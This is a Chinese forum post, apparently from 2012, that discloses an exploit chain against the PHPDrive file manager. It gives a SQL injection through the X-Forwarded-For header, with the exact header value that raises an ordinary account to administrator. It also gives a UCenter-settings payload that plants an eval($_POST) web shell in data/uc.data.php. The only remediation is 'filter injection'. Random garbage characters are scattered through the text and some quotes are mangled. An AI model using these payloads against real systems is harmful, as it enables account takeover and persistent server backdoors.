PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
6 D& w+ J% O6 C: x* O) k# ?8 l: [2 w. c- l" |- m# j* l
includes/user.lib.php
0 S M. `8 ]8 H行87
% g2 A$ x4 T* c2 w function get_ip() {
' K( u+ Q3 ^$ H1 d4 U if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
& ]2 _8 q& E2 d" a, X在用户注册与登录 处module/disk/account.lead.php& _) G/ ?) N1 F6 @6 V
198行 3 T: G" X" B9 A5 U7 L
//更新本次登录IP和时间
& @' ^; k" W- w0 U( K0 m $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生8 {2 \! }2 c/ z* ?2 M3 G
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
1 {+ I; D# _, E4 u+ ^; }2 c实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
$ P. D6 ^* ]( u$ ]后台getshell:+ L1 q7 m# C' T/ w9 ?/ ?- J
在UCenter设置处,将UC数据库登录名填写为
$ D8 p, f( Q1 a 3 G- Q0 Y7 x7 H; b6 @
root’);eval($_POST[DisKill]);?>/*( ]+ O3 x( j" K
可以得到一个shell,位置在 data/uc.data.php
0 _& ^# L( g, |& _7 ]% k4 m3 \9 b N! l# T8 E. Q
修复:过滤注入
* K# S( v) L7 q# ]( j' z2 q Y4 N- G. M8 S- w2 b8 V* z
|
发表于 2012-12-31 09:18:34
收藏
支持
反对